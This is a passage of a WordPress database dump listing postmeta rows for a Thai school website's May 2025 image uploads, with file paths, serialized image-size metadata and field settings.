(3146,1178,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:128:\"2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4.jpg\";s:8:\"filesize\";i:307937;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18617;}s:5:\"large\";a:5:{s:4:\"file\";s:129:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138999;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7435;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87963;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:128:\"LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21472;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3148,1164,'_thumbnail_id','1165'),
(3149,1164,'_edit_last','1'),
(3150,1164,'title_style','default'),
(3151,1164,'_title_style','field_5d1a0217cf408'),
(3152,1179,'title_style','default'),
(3153,1179,'_title_style','field_5d1a0217cf408'),
(3154,1180,'_edit_lock','1746764631:1'),
(3155,1181,'_wp_attached_file','2025/05/1-68.png'),
(3156,1181,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2025/05/1-68.png\";s:8:\"filesize\";i:2550158;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"1-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:86795;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"1-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:714754;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"1-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38371;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"1-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:809413;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"1-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1522177;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"1-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:112715;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3158,1180,'_edit_last','1'),
(3159,1180,'title_style','default'),
(3160,1180,'_title_style','field_5d1a0217cf408'),
(3161,1180,'related',''),
(3162,1180,'_related','field_603b51c3e183e'),
(3163,1182,'title_style','default'),
(3164,1182,'_title_style','field_5d1a0217cf408'),
(3165,1182,'related',''),
(3166,1182,'_related','field_603b51c3e183e'),
(3168,1180,'_thumbnail_id','1181'),
(3170,1164,'related',''),
(3171,1164,'_related','field_603b51c3e183e'),
(3172,1179,'related',''),
(3173,1179,'_related','field_603b51c3e183e'),
(3175,1184,'_wp_attached_file','2025/05/495090140_122153069060511674_4169399057052512528_n.jpg'),
(3176,1184,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/495090140_122153069060511674_4169399057052512528_n.jpg\";s:8:\"filesize\";i:437451;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"495090140_122153069060511674_4169399057052512528_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21429;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"495090140_122153069060511674_4169399057052512528_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144871;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"495090140_122153069060511674_4169399057052512528_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8835;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"495090140_122153069060511674_4169399057052512528_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93999;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"495090140_122153069060511674_4169399057052512528_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:263595;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"495090140_122153069060511674_4169399057052512528_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23144;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3188,1186,'_edit_lock','1747232688:1'),
(3189,1188,'_wp_attached_file','2025/05/293958.jpg'),
(3190,1187,'_wp_attached_file','2025/05/S__37961737_0.jpg'),
(3191,1190,'_wp_attached_file','2025/05/293960_0.jpg'),
(3192,1189,'_wp_attached_file','2025/05/293956_0.jpg'),
(3193,1187,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:25:\"2025/05/S__37961737_0.jpg\";s:8:\"filesize\";i:348434;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__37961737_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17136;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__37961737_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119978;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__37961737_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6740;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__37961737_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76036;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__37961737_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18612;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3194,1188,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1704;s:6:\"height\";i:961;s:4:\"file\";s:18:\"2025/05/293958.jpg\";s:8:\"filesize\";i:373633;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"293958-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18759;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"293958-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:179540;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"293958-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9209;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"293958-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105487;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"293958-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:363616;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"293958-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24203;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3195,1190,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1704;s:6:\"height\";i:961;s:4:\"file\";s:20:\"2025/05/293960_0.jpg\";s:8:\"filesize\";i:294046;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"293960_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19458;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"293960_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159605;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"293960_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9119;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"293960_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98934;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"293960_0-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:302947;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"293960_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24576;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3196,1189,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:20:\"2025/05/293956_0.jpg\";s:8:\"filesize\";i:160106;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"293956_0-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14553;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"293956_0-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111202;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"293956_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6632;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"293956_0-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111202;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"293956_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18165;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3197,1191,'_wp_attached_file','2025/05/293970_0.jpg'),
(3198,1191,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1704;s:6:\"height\";i:961;s:4:\"file\";s:20:\"2025/05/293970_0.jpg\";s:8:\"filesize\";i:433184;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"293970_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19788;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"293970_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206437;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"293970_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9556;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"293970_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120570;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"293970_0-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:419916;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"293970_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25874;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3199,1192,'_wp_attached_file','2025/05/62082_0-Copy.jpg'),
(3200,1192,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/62082_0-Copy.jpg\";s:8:\"filesize\";i:135386;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"62082_0-Copy-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14830;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"62082_0-Copy-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100499;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"62082_0-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6241;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"62082_0-Copy-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63730;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"62082_0-Copy-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14170;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3201,1193,'_wp_attached_file','2025/05/293290_0-Copy.jpg'),
(3202,1194,'_wp_attached_file','2025/05/62078_0-Copy.jpg'),
(3203,1193,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:961;s:6:\"height\";i:1704;s:4:\"file\";s:25:\"2025/05/293290_0-Copy.jpg\";s:8:\"filesize\";i:165859;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"293290_0-Copy-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14589;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"293290_0-Copy-578x1024.jpg\";s:5:\"width\";i:578;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100882;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"293290_0-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6827;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"293290_0-Copy-768x1362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152385;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"293290_0-Copy-866x1536.jpg\";s:5:\"width\";i:866;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:181240;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"293290_0-Copy-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13319;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3204,1194,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/62078_0-Copy.jpg\";s:8:\"filesize\";i:107036;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"62078_0-Copy-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11835;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"62078_0-Copy-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81155;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"62078_0-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5338;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"62078_0-Copy-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51437;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"62078_0-Copy-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10360;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3205,1195,'_wp_attached_file','2025/05/293288_0-Copy.jpg'),
(3206,1196,'_wp_attached_file','2025/05/293293_0-Copy.jpg'),
(3207,1195,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:961;s:6:\"height\";i:1704;s:4:\"file\";s:25:\"2025/05/293288_0-Copy.jpg\";s:8:\"filesize\";i:172962;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"293288_0-Copy-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12923;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"293288_0-Copy-578x1024.jpg\";s:5:\"width\";i:578;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97064;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"293288_0-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6722;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"293288_0-Copy-768x1362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152741;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"293288_0-Copy-866x1536.jpg\";s:5:\"width\";i:866;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185002;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"293288_0-Copy-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14108;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3208,1196,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:961;s:6:\"height\";i:1704;s:4:\"file\";s:25:\"2025/05/293293_0-Copy.jpg\";s:8:\"filesize\";i:268978;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"293293_0-Copy-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16356;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"293293_0-Copy-578x1024.jpg\";s:5:\"width\";i:578;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139735;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"293293_0-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7665;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"293293_0-Copy-768x1362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:224004;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"293293_0-Copy-866x1536.jpg\";s:5:\"width\";i:866;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:272906;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"293293_0-Copy-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19841;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3209,1197,'_wp_attached_file','2025/05/293289_0-Copy.jpg'),
